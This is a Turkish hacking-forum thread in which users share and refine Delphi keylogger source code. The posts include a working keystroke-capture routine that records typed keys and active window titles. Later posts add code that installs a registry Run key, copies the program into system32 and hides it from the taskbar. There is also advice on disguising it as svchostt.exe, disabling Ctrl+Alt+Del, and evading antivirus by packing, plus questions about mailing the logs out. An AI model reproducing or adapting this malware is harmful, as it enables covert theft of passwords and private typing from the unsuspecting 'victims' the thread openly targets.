delphi ile keylogger yapımı tuslar maille geliyor111

[bymxx]

var
Form1: TForm1;
ss:string; Current_App:String;

implementation

{$R *.dfm}

procedure TForm1.Timer1Timer(Sender: TObject);
var
i:integer;
handler:THandle;
caption : array[0..80] of Char;
begin
for i:=8 To 255 do
begin
if GetAsyncKeyState(i)=-32767 then
case i of
17 : ss := ss + ' [Ctrl] ';
18 : ss := ss + ' [Alt] ';
8 : ss := ss + ' ';
9 : ss := ss + ' [TAB] ';
20 : ss := ss + ' [CapsLock] ';
21 : ss := ss + ' [CapsLock] ';
13 : ss := ss + ' [Enter] '+#13#10;
27 : ss := ss + '[Escape]';
32 : ss := ss + ' ';
33 : ss := ss + ' [PageUp] ';
34 : ss := ss + ' [PageDown] ';
35 : ss := ss + ' [End] ';
36 : ss := ss + ' [Home] ';
37 : ss := ss + ' [OK:Sol] ';
38 : ss := ss + ' [OK:Yukarı] ';
39 : ss := ss + ' [OK:Sağ] ';
44 : ss := ss + ' [PrintScreen] ';
40 : ss := ss + ' [OK:Aşağı] ';
45 : ss := ss + ' [İnsert] ';
46 : ss := ss + ' [Delete] ';
144 : ss := ss + ' [NumLock] ';
145 : ss := ss + ' [ScrollLock] ';
$10 : ss := ss + ' [Shift] ';



//üstteki rakamlar
48 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + '='
else if GetKeyState(18) < 0 then
ss:=ss+'}'
else
ss := ss + '0';

223: if GetKeyState(VK_SHIFT) < 0 then
ss := ss + '?'
else if GetKeyState(18) < 0 then
ss := ss + '\'
else ss := ss + '*';

49 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + '!'
else if GetKeyState(18) < 0 then
ss := ss + '>'
else
ss := ss + '1';

50 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + ''''
else if GetKeyState(18) < 0 then
ss := ss + '£'
else
ss := ss + '2';

51 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + '^'
else if GetKeyState(18) < 0 then
ss := ss + '#'
else
ss := ss + '3';

52 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + '+'
else if GetKeyState(18) < 0 then
ss := ss + '$'
else
ss := ss + '4';

53 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + '%'
else if GetKeyState(18) < 0 then
ss := ss + '½'
else
ss := ss + '5';

54 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + '&'
else
ss := ss + '6';

55 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + '/'
else if GetKeyState(18) < 0 then
ss := ss + '{'
else
ss := ss + '7';

57 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + ')'
else if GetKeyState(18) < 0 then
ss := ss + ']'
else
ss := ss + '9';
//...
56 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + '('
else if GetKeyState(18) < 0 then
ss := ss + '['
else
ss := ss + '8';

65..90 : //a-z,A-Z
if Odd(GetKeyState(VK_CAPITAL)) then
if GetKeyState(VK_SHIFT) < 0 then
ss := ss + LowerCase(Chr(i))
else
ss := ss + UpperCase(Chr(i))
else
if GetKeyState(VK_SHIFT) < 0 then
ss := ss + UpperCase(Chr(i))
else
ss := ss + LowerCase(Chr(i));

//NUMPAD
96 : ss := ss + '0';
97 : ss := ss + '1';
98 : ss := ss + '2';
99 : ss := ss + '3';
100 : ss := ss + '4';
101 : ss := ss + '5';
102 : ss := ss + '6';
103 : ss := ss + '7';
104 : ss := ss + '8';
105 : ss := ss + '9';
106 : ss := ss + '*';
107 : ss := ss + '+';
109 : ss := ss + '-';
110 : ss := ss + ',';
111 : ss := ss + '/';
112..123 :


//F1-F12
ss := ss + '[F' + IntToStr(i - 111) + ']';
186 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + 'ş'
else ss := ss + 'ş';
187 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + '+'
else ss := ss + '=';
188 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + ';'
else ss := ss + ',';
189 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + '_'
else if GetKeyState(18) < 0 then
ss := ss + '|'
else
ss := ss + '-';
190 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + ':'
else ss := ss + '.';
191 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + 'ö'
else ss := ss + 'ö';
192 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + 'é'
else ss := ss + '"';
219 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + 'Ğ'
else ss := ss + 'ğ';
220 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + '|'
else ss := ss + '';
221 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + 'ü'
else ss := ss + 'ü';
222 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + 'i'
else ss := ss + 'i';
226 : if GetKeyState(VK_SHIFT) < 0 then
ss := ss + '>'
else ss := ss + '<';

end;
end;
handler := GetForegroundWindow;
GetWindowText(handler,caption, 80);
if (caption<>Current_App)and(caption<>'') then
begin
Current_App := caption;
ss := ss+#13#10'['+caption+']-['+TimeToStr(Now)+']'+#13#10;
end;
Memo1.Lines.Clear;
Memo1.Lines.Add(ss);
end;


procedure TForm1.Timer2Timer(Sender: TObject);
begin
//memo1.Lines.SaveToFile('c:/deneme.txt');
end;

end.

bunlar keylogger kodları mail atmayı yani mail atmak için kullanılan kodları artık herkes biliyordur bilmeyen çalıştıramayan içinden çıkamayan olursa yazsın yardımcı olurum bu sadece keylogger bütün kodları pcmde bi yazayım derleyip son halinide atacam kaldırdığım için kusura bakmayın herkes bilsin öğrenmeyen kalmasın delphi mi c mi die soranlar var c++ derim bende buradan onlarada kendimizce bi yorum yapalım cevaplarınızı belkliyorum
yeni projelerimle ve kodlarımla 3 ay sonra hackhell e döneceğim

 

[realdream0]

kanka daha dun acmissin konuyu biras bekleseydin ben ilgilencektim mesela

 

[bytan]

ilgilinen birileri olmadığı için kaldırıyorum konuyu silebilirsiniz beni de tabi kalın
sağlıcakla

yaptığın paylaşımlarının cevaplanmamasına yorum yazılmamasına teşekkür edilmemesine alışacaksın.bu sadece senin değil tüm paylaşım yapan emek sarfedenlerin sorunu.bir beklenti içerisinde paylaşım yapıyorsan bundan vazgeç.bilgi birikim ve emeğini paylaşacaksan, birilerinin bunlardan haberinin olmasını istiyorsan, bunlardan faydalanacak ve bikaç kelime karalayacak arkadaşlar olarak buradayız.
Bizimde paylaşımlarımız onlarca okunma ve downloadlara ragmen tek bir yorum yapılmadan sayfalar arasında kaybolup gidiyor.ben tşk sevdalısı biri değilim.yaptıgım paylaşımlarda tek istegimin yorum oldugunu soyluyorum hep ve kızdıgım tek nokta da bu oluyor.

Konunun başlığını görünce bir hevesle açtım faydalanabilecegim bir sey bulabilir miyim diyerek ama büyük bir hayalkırıklıgı.bu şekilde kızıp verdiğini geri alacaksan bence hiç konu açma.ama sırf paylaşmış olmak için paylaşma amacıyla konu açacaksan, seni ve emeğini takdir etmek için bizler varız.
Karar senin.
İyi çalışmalar

 

[bymxx]

geçen gün bi sitede japon amcaların messengerını gördüm regnessem die bide türk versiyonu olsun die düşündüm
bu camia nasıl karşılar merak ediyorum önerilerinizi bekliyorum delphi yapmışlar bide biz yapalım kapak olsun ne dersiniz anlayan arkadaşları beklerim yardımlaşırsak büyük bir projeye imza atabiliriz...
bekliyorum


delphi ile ilgili soru alabilirim mesaj atabiirsiniz bas bas

[email protected]

tekrar yayınlarım ilgilenen birilerinin olması sevindirci

 

[Korsan00]

yeniden açarmısınız konuyu.

 

[metincan20]

selam sanırım faydalanabileceğim bir kayanağa ulaştım teşekkürler

 

[Xpert1ynx]

İyi tamamda keylogger diyebilmek için programın "görev yöneticisi"nde görülmemesi, antivirüs programları tarafından yakalamaması gerekiyor (ki application integry kontrol aktifse yakalanır). Ben burda keylogger olacak kodları göremiyorum.

 

[ercann]

Kardesler mükenmel bir keylogger yapamiyanlar bakin nasil ayar oliyor video yaptim
-->http://uploaded.to/?id=2jwxbx

 

[bymxx]

İyi tamamda keylogger diyebilmek için programın "görev yöneticisi"nde görülmemesi, antivirüs programları tarafından yakalamaması gerekiyor (ki application integry kontrol aktifse yakalanır). Ben burda keylogger olacak kodları göremiyorum.

herhangi bir timerın olayına form1.hide; yaz saniye kısmını sadece 1 yap o gözükmez
bu kesmiyor ise registry ayarları ile ctrl+alt+delete tuş kombinasyonunu kullanıma kapat
ama ben bunu tavsiye etmem kurban kıllanır
svchostt.exe diye system32 nin altına kaydettir kombinasyon açık kalsın dikkat çekmez

 

[Xpert1ynx]

herhangi bir timerın olayına form1.hide; yaz saniye kısmını sadece 1 yap o gözükmez
bu kesmiyor ise registry ayarları ile ctrl+alt+delete tuş kombinasyonunu kullanıma kapat
ama ben bunu tavsiye etmem kurban kıllanır
svchostt.exe diye system32 nin altına kaydettir kombinasyon açık kalsın dikkat çekmez

Peki Anti-Virüs yazılımdan nasıl saklayacaksın? Tuş takımına hook atmadan tuşları kaydetmen için formun etkin olması lazım. Hook attığın anda yakalanır. CTRL+ALT+DEL'i engellemenin başka yollarıda var.
Niçin timer'a gizletiyoruz formu? Form create'tinden sonra gizlememizin ne zararı var? Gereksiz yere timer kullanmanın mantığı nedir?
Bir diğer konuda mail yollama. Bunun için ya bir smtp sunucuya bağlanacaksın ya da keylogger içine smtp sunucuyu entegre edeceksin. ( web maili saymıyorum bile, kimsenin bu kadar bilinçsiz olduğunu sanmıyorum ) Hiç bir şey değil sadece Windows Firewallu açıksa bile kabak gibi ekranda ... uygulama internete erişmeye çalışıyor yazısı görüntülenecek. Diyelimki bu önlemleri aştın kendi smtp sunucunu yazdın. Bu seferde keylogger'ın dosya boyutu şişecek ayrıca internet üzerinde işlem yaptığın için takip edilebileceksin.

Son olarak eğer bu yasal ( patronların, güvenlik riski olan yerlerde, çalışanları denetlemek için kullanması gibi ) bir program olsaydı başarılı olabilirdi ( başarılı değil, olabilirdi ) fakat gerçek bir keylogger için kesinlikle başarısız.
Ek olarak ben bunların nasıl yapıldığını biliyorum zaten sadece kodun geri kalanını siz yazarsınız deyip bırakmaman için yazdım.

 

[bymxx]

Peki Anti-Virüs yazılımdan nasıl saklayacaksın? Tuş takımına hook atmadan tuşları kaydetmen için formun etkin olması lazım. Hook attığın anda yakalanır. CTRL+ALT+DEL'i engellemenin başka yollarıda var.
Niçin timer'a gizletiyoruz formu? Form create'tinden sonra gizlememizin ne zararı var? Gereksiz yere timer kullanmanın mantığı nedir?
Bir diğer konuda mail yollama. Bunun için ya bir smtp sunucuya bağlanacaksın ya da keylogger içine smtp sunucuyu entegre edeceksin. ( web maili saymıyorum bile, kimsenin bu kadar bilinçsiz olduğunu sanmıyorum ) Hiç bir şey değil sadece Windows Firewallu açıksa bile kabak gibi ekranda ... uygulama internete erişmeye çalışıyor yazısı görüntülenecek. Diyelimki bu önlemleri aştın kendi smtp sunucunu yazdın. Bu seferde keylogger'ın dosya boyutu şişecek ayrıca internet üzerinde işlem yaptığın için takip edilebileceksin.

Son olarak eğer bu yasal ( patronların, güvenlik riski olan yerlerde, çalışanları denetlemek için kullanması gibi ) bir program olsaydı başarılı olabilirdi ( başarılı değil, olabilirdi ) fakat gerçek bir keylogger için kesinlikle başarısız.
Ek olarak ben bunların nasıl yapıldığını biliyorum zaten sadece kodun geri kalanını siz yazarsınız deyip bırakmaman için yazdım.

aç ta bir bak bakalım yakalanıyo mu takip ettirebilecen mi bulabilecen mi
http://by_max.byethost13.com/download/turkey.rar


buraya php için denemeler yaptığım bu bedava host bir örnek attım aç bakalım bi dene
sağdan soldan büssürü bişiler duymuşsun okumuşsun gelmişsin konuşuyosun yazdıklarından ne kadar bilgili olduğun belli aç ta bi bak şiddetle sana tavsiye ediyorum

ctrl+alt+delete registry kayıtları ile kullanımı kapatılabilir program saklanabilir bende biliyorum buradakiler sizler için

smtp için gerekli kodlar orada yazmıyor tamamını okusaydın zaten anlardın neyse seni kendi haline bırakıyom meydan senin istediğin gibi at koştur benden bu kadar



iyilik yap denize at demişler !!!!!

 

[free!]

tartışma olursa paylaşımları görmezlikten gelebilirim belirteyim.... bilmem anlatabildimmi???

 

[bymxx]

kaynak kodu açık olan herşeyi bende bulurum kardeşim saol be armut pişş ağzıma düş ne güzel hangi virüs kendini bi yere kopyalıyor hangi trojan nerede gizleniyor söle bende biliyorum delete ye basmayı çok saol


bak bakalım


procedure TForm1.FormCreate(Sender: TObject);
var
reg: TRegistry;
a:hwnd;
begin
reg := TRegistry.Create;
reg.RootKey := HKEY_LOCAL_MACHINE;
reg.LazyWrite := false;
reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',false);
reg.WriteString('system32.exe', 'c:\windows\system32\system32.exe');
reg.CloseKey;
reg.free;
setwindowlong(application.Handle,gwl_exstyle,ws_ex_toolwindow);// task bardan gizliyoooo bilirsin sen ama ben yazayım dedim
GetSystemDirectory(S32Klasoru, sizeof(S32Klasoru));
if fileexists(PChar(S32Klasoru + '\örnek.exe')) then
Abort
else
CopyFile(PChar(Application.Exename), (PChar(S32Klasoru + '\örnek.exe')), True);
end;



herşey belli system32 nin altında kayıtlı böle olursa ne güzel demi hangi virüs,trojan pcye bulaşırken ben buradayım buda benim kaynak kodum der çok merak ediyorum
kardeşim ben sana sataşmıyorum benim bildiklerim bunlar daha iyisini biliyorsan yap bende senden faydalanayım
beni yanlış anlama kusur ettiysek affola düşman değil dost ediinmek isterim ben kalın selametle

 

[Xpert1ynx]

Buluşsal tarama ile zararlı kodların çoğu ortaya çıkar. Ben virüs imzalarından değil aic ( application integrity control ) bahsediyorum. Şimdi bir virüs yazdık diyelim. Yazdığımız virüs birden sistem disketinin olmadığı mesajını çıkaracak diyelim belirtilen zamanda ( çernobil gibi zamana göre tetiklenecek ) en basitinden. Virüs sürekli arka planda çalışsın aaa hiç uyarı vermeyecektir çünkü virüsümüzün o ana kadar yaptığı iş sadece tarihi belirtilen tarihle karşılaştırmaktır. İstenilen tarih o anki tarihe eşit olunca ise virüsün asıl kısmı çalışacak int18 kesmesine yardımıyla "hiçbir işletim sisteminin bulunamadığı" mesajı verilecektir. Şimdi aic de arka planda çalışsın. BIOS fonksiyonlarının kullanılması genelde riski bir işlem olduğu için aic'in kontrol listesinde bunlarda yer alacaktır. Virüsün kodu bu kısımda kesmeyi çağırdığı anda aic hemen durumu fark edecek, virüsümüzün erişimini varsa ayarlı kurallara göre engelleyecek yoksa duraklatıp kullanıcıya ne yapacağını soracaktır. Tabi bu gelişmiş bir güvenlik sistemi olan kullanıcıda işe yarayacaktır.

Antivirüs programları dosya taraması sırasında buluşsal olarak yine bizim virüsümüzü tespit edebilir ( hiçbir virüs imzasına uymadığı halde ).Bunu engelemenin tek yolu virüsümüzü pack etmektir.

Kot güzel. Kullanıcıyı yanıltabilir ama hedef windows xp de olsa görev yöneticisinden programımızı gizlemek olmalı. Belki sürekli çalışan bir uygulanın bellek bölümüne bizim uygulamamız yerleştirilebilirse bu gerçekleşebilir. Maalesef bunu yapacak birini tanımıyorum.

Bende düşman kazanmak istemem ama yazdıklarımın hepsi için kanıt sunabilirim. Sallamam, Sallayanıda sevmem

 

[bymxx]

farklı bir program çalıştığında herhangi bişi bizim programda tetiklrensin mi istiyorsun ek olarak arka planda misal winamp açıldığında????
onuda yaparız kardeş
kastettiğin şey buysa tabi pek anlamadım
uygulamalar bölümünden saklanıyor fatak işlemlerde ileri düzey bi ördek bunu fark ediyor registryden sadece işlemleri kapatabiliriz ama anlaşılır dediğim gibi ek yapılabilir ama

 

[bymxx]

farklı bir program çalıştığında herhangi bişi bizim programda tetiklrensin mi istiyorsun ek olarak arka planda misal winamp açıldığında????
onuda yaparız kardeş
kastettiğin şey buysa tabi pek anlamadım
uygulamalar bölümünden saklanıyor fatak işlemlerde ileri düzey bi ördek bunu fark ediyor registryden sadece işlemleri kapatabiliriz ama anlaşılır dediğim gibi ek yapılabilir ama

 

[nqnr]

Daha İlk Mesajım. Konuda Cevaplarda Harika Bu Kadar Bilen İnsanı Bi arada bulmak zor. O kadar delphi bilgim Yok ama İlgimi Çekti. bi deneyeyim. Paylaşım için Saol.

 

[144]

logları ftp ye nasıl atarım ?

 

[memocell]

Emeğine sağlık delphide suan denedim çalışıyor .
Ama bi sorum olucak ;
bunu mail adresimizi yazıp nasıl maile attıracaz
memo1.Lines.SaveToFile('c:/deneme.txt'); bu komut tuşları C'ye kaydediyo
bunu mail adresimize yollattırırken nasıl bi komut yazdıracaz oraya
şimdiden teşekkürler
selametle

 

[bjkfeyyaz]

teşekkürler